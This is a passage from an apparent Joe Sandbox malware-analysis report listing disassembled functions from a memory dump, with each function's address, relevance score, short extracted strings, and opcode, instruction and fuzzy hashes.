Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A

Function 00422270 Relevance: 3.0, Strings: 2, Instructions: 501COMMON

Download Yara Rule

Strings

TU, xrefs: 00422296
c!", xrefs: 0042242F

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: TU$c!"
API String ID: 0-3813282519
Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A

Function 0041D074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

pr, xrefs: 0041D112
|~, xrefs: 0041D10A

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: pr$|~
API String ID: 0-4145297803
Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E

Function 0041D087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

pr, xrefs: 0041D112
|~, xrefs: 0041D10A

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: pr$|~
API String ID: 0-4145297803
Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E

Function 0042536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

BLJB, xrefs: 00425554
X, xrefs: 0042556A

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: BLJB$X
API String ID: 0-2222927247
Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A

Function 00427653 Relevance: 2.6, Strings: 2, Instructions: 86COMMON

Download Yara Rule

Strings

H.s , xrefs: 004276E0
ij, xrefs: 004276D3

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: H.s $ij
API String ID: 0-4017226643
Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46

Function 00415EE0 Relevance: 1.9, Strings: 1, Instructions: 625COMMON

Download Yara Rule

Strings

1/3T, xrefs: 0041611F

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID: 1/3T
API String ID: 2994545307-3266294232
Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58

Function 0042BFDA Relevance: 1.7, Strings: 1, Instructions: 461COMMON

Download Yara Rule

Strings

x, xrefs: 0042C2F2

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57

Function 0042BFD3 Relevance: 1.7, Strings: 1, Instructions: 456COMMON

Download Yara Rule

Strings

x, xrefs: 0042C2F2

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797

Function 004266E7 Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

&tB, xrefs: 00426E9A

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: &tB
API String ID: 0-268467982
Opcode ID: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
Instruction ID: 06a34f82c29db43340e48ad1cbe7e395302b1ddd3c50ea808075b5b9ec83bf05
Opcode Fuzzy Hash: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
Instruction Fuzzy Hash: C5E169B5A083618FC7109F14E45136BB7E1AFDA304F0A486EE8C597342D639ED45CB9B

Function 0042A630 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 0042A918

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B

Function 0043E690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

@CDE, xrefs: 0043E8D1

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID: @CDE
API String ID: 2994545307-1513065382
Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796

Function 00417190 Relevance: 1.6, Strings: 1, Instructions: 375COMMON

Download Yara Rule

Strings

RuA, xrefs: 00417542

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: RuA
API String ID: 0-3286949753
Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58

Function 00421EE0 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

x%, xrefs: 0042207D

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: x%
API String ID: 0-3980080454
Opcode ID: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
Instruction ID: 53925fe815e81de9676dfe4c3668865c11de61aed011eb2c10e86570e61a59d5
Opcode Fuzzy Hash: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
Instruction Fuzzy Hash: 7BA145B1604320ABCB10DF24DC91B6777E4FF94358F08492DEA858B391E7B9E905C766

Function 0042AAD0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042ACCE

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B

Function 00417E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

tuv, xrefs: 00418856

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: tuv
API String ID: 0-2475268160
Opcode ID: 832319e91b6d4892eeb44864a439925f3f6d3c4679f0fc0c8248a51ed8917232
Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
Opcode Fuzzy Hash: 832319e91b6d4892eeb44864a439925f3f6d3c4679f0fc0c8248a51ed8917232
Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759

Function 00425F7D Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

1_B, xrefs: 00426164

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: 1_B
API String ID: 0-2132359058
Opcode ID: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
Instruction ID: 5b09de0f708086b2db089408e795921656c95d083517461b5049a84f32a7c51a
Opcode Fuzzy Hash: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
Instruction Fuzzy Hash: D8415972D09B7487C230DA64A81017BB6D5DB85310F9A847FF9C697342EB38AD01A7CA

Function 0042B4BB Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

CUUI, xrefs: 0042B588

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: CUUI
API String ID: 0-173970609
Opcode ID: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
Instruction ID: 633f9cfe08b78efd1148aada0c0c4a0bea52aba14bf5254293374e99ea80dff2
Opcode Fuzzy Hash: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
Instruction Fuzzy Hash: 9541E7A020C7E08ADB358F2594903ABBBE1DFD3304F5884ADC6C56B243C77988068B5A

Function 0043DBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 0043DC39

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A

Function 00425230 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

cba`, xrefs: 004252B6

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID: cba`
API String ID: 2994545307-1926275841
Opcode ID: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
Instruction ID: beb69707a00ddb1e0f288a180930159145dfafadf277c1aff9f3426dfcb85bde
Opcode Fuzzy Hash: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
Instruction Fuzzy Hash: 47113536A44B204BC324CE289DC163777E1AB95314F95263DDCA9D33A1E278EC009AD9

Function 00407470 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
Instruction ID: af49202ca076376fa415bca2a3091a328854806cafe53c7e33487b358e5641c5
Opcode Fuzzy Hash: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
Instruction Fuzzy Hash: 9722B332A087118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47

Function 0043CAC0 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
Instruction ID: a0fb517757f1b8da7777bae7579d9f52a382c29ac2183c4fd28747a7d9f1db1e
Opcode Fuzzy Hash: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
Instruction Fuzzy Hash: F402127AB04216CFC704CF28E8906AAB7F2FB8A311F1A847ED58593351D734AD55CB86

Function 0043CBD6 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
Instruction ID: 0188f3e029ce03e8205a7a452b25b6dbd5bcd661a0513372e50984eaaf58ab41
Opcode Fuzzy Hash: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
Instruction Fuzzy Hash: 98E12F79B04216CFC704CF68E8906AAB7F2FB8A312F1A847EE585D3351D334A955CB85

Function 00405910 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
Instruction ID: 292f23283d7cd07bb6fd19c8603031892cd16be448e450c68c3e166b8ce1a4f1
Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
Instruction Fuzzy Hash: DAF1CF356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB5A

Function 0043CCE0 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
Instruction ID: b7c2eaf3338182462aad9b41d84ad1057b9f4e6ab3b7739cdaab2d2094e4d2b6
Opcode Fuzzy Hash: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
Instruction Fuzzy Hash: 36C1007AA04216CFC704CF28E8906AAB7F2FB8A311F1A447DE98593351D734ED54CB85

Function 004286F0 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
Instruction ID: 56b07d3b8ecf2697cfceb0b79347f06369642de1c8fee68a0e9743baf01ab03d
Opcode Fuzzy Hash: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
Instruction Fuzzy Hash: 46C12EB060D3218AC314DF14D86272BB7F2EF92364F44891DF0D19B395EB789905CB9A

Function 0043CD60 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
Instruction ID: 20c8691d40d2db25294344e9a87d3a2a4619c2758e90d916e0ff6e9b3fbd9dce
Opcode Fuzzy Hash: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
Instruction Fuzzy Hash: 95B1FE7AA14216CFC704CF68E8906AAB7F1FB8A311F1A447EE98693350D734ED54CB85

Function 0043CE00 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
Instruction ID: 02c91c5c175dbfc798e5ae80a92b3f6d79b9f3e28c5cee1d4de64ad44bd3bbdb
Opcode Fuzzy Hash: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
Instruction Fuzzy Hash: 28B1FE79A08216CFC704CF28E8906AAB7F1FB8A311F1A487DE985D3350D734E955CB95

Function 00416E97 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
Instruction ID: 5a7d6a52498181c9cf4f87941996139a214d8b31775e9e11dc627d5a44ad725e
Opcode Fuzzy Hash: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
Instruction Fuzzy Hash: 73A143B46047418FD724CF29C8D1B63B7E2AB5A304F14892ED59A87792D338E886CB58

Function 0043DFB0 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
Instruction ID: 9eaef7f6449a926bdd011e6bf6c7dc343cb48eef6fbbacc1f9e318c96c7b604e
Opcode Fuzzy Hash: b7535c463ae1e5bcf3702ce14ffd2b5f638eb3eed67e07491a9c0359b24ec7dd
Instruction Fuzzy Hash: 6891DF356053118BC718DF1AC890A2BB3F6EF9D710F19996DE8858B391E734EC01CB86

Function 0043DCF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A

Function 00428F5D Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
Instruction ID: 0033b059549c864885c35c4736f174911fb7ab2e2a7e13fdb612373215023671
Opcode Fuzzy Hash: 485f9e8018368faea3edae90e71b0f5b01441832ec9af48811220032a096e4bd
Instruction Fuzzy Hash: 939168B2A083558FC714CF25945226FF7A2AFD1304F98892EE4E687382D639DD05CB4A

Function 0041CEA5 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
Instruction ID: 79a636d4ef35a115cd61f203c964b336e8654c9833e22f85933b964d871e8aad
Opcode Fuzzy Hash: 7d03f9876956ffac6f74f0866a7bde9a035be760a6bedc0074a97e3c21121794
Instruction Fuzzy Hash: 824113B455835287CB209F289C413BBF3F1AFA2358F59455EE8C597380E738D992C36A

Function 00427307 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
Instruction ID: cd3817f91458a04e6f4698fbdec964a5fe2b941d70aabd782eb82a79c60357af
Opcode Fuzzy Hash: 4c7e07812f1b8347d7007c075ffe03fcbbfb4954c80059fd09941d44e601273e
Instruction Fuzzy Hash: 4751EBB060C3208AC720DF60E49132BB7F0EFA2344F40492DD9D64B761EB799908DB9B

Function 004292D0 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45

Function 00436B20 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5

Function 0041597D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

